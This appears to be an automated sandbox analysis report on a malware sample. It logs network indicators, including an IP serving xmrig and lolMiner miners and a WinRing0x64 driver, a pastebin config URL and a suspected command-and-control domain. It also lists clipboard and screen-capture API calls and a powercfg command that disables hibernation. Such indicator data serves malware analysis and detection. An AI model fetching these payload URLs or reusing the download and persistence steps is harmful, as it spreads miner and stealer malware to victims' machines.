Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: citydisco.bet
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:34:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 91fb902648ca22c3-ORD

Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/C
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/D
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/J
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDog.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr	String found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDog.exeP
Source: setupx 1.exe1.exe, 00000002.00000003.1308460293.000000000386A000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2258316500.000000000386C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDogee
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WinRing0x64.sys
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000000.1215296075.0000000000D32000.00000002.00000001.01000000.00000008.sdmp, ZHKYZWVTC38PGAWGZF49K.exe.2.dr	String found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WinRing0x64.sysP
Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308909879.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256465217.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255217438.0000000000ECB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe
Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe:
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/lolMiner.exe
Source: setupx 1.exe1.exe, 00000002.00000002.2256621404.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/xmrig.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/xmrig.exeP
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51D
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.000000000317A000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.10.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 0000000D.00000002.1238344010.0000000003057000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.comd
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: setupx 1.exe1.exe, 00000002.00000003.1082733227.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004E91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBLr
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308962927.0000000000FC7000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113377940.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256196112.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182650520.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2256410561.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139805381.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: setupx 1.exe1.exe, 00000002.00000003.1152775702.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1182053990.0000000000FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/D
Source: setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/Vs16c
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139485056.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139728518.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000002.2255908312.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1154406299.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: setupx 1.exe1.exe, 00000002.00000002.2256041446.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308487060.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS6
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISAAIA
Source: setupx 1.exe1.exe, 00000002.00000003.1082401555.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1108659728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1113252451.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1081894496.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISre
Source: setupx 1.exe1.exe, 00000002.00000003.1081790283.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS71025-5-
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 0000000D.00000002.1239270589.0000000004FE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 0000000D.00000002.1243414678.0000000005EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003071000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000003064000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, ZHKYZWVTC38PGAWGZF49K.exe, 0000000A.00000002.1289784178.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, logs.uce0.10.dr, logs.uce1.10.dr, logs.uce.10.dr	String found in binary or memory: https://pastebin.com/raw/YpJeSRBC
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: setupx 1.exe1.exe, 00000002.00000003.1036434273.00000000037D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: setupx 1.exe1.exe, 00000002.00000003.1108930145.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1109422198.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: setupx 1.exe1.exe, 00000002.00000003.1083770178.00000000037E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: setupx 1.exe1.exe, 00000002.00000003.1084005779.0000000003AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.8:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E5B0

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_03581000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_03581000

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_0043E5B0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E5B0

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_0043F276 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0043F276

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CC6460	0_2_00CC6460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00C8553B	0_2_00C8553B
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CC4CB0	0_2_00CC4CB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CA1F50	0_2_00CA1F50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00C950E0	0_2_00C950E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CA00E0	0_2_00CA00E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00C9A0F0	0_2_00C9A0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CD90F0	0_2_00CD90F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CDE0F0	0_2_00CDE0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CEB0F0	0_2_00CEB0F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CC6090	0_2_00CC6090
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CDC050	0_2_00CDC050
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CBD070	0_2_00CBD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00CDD070	0_2_00CDD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 0_2_00C81000	0_2_00C81000
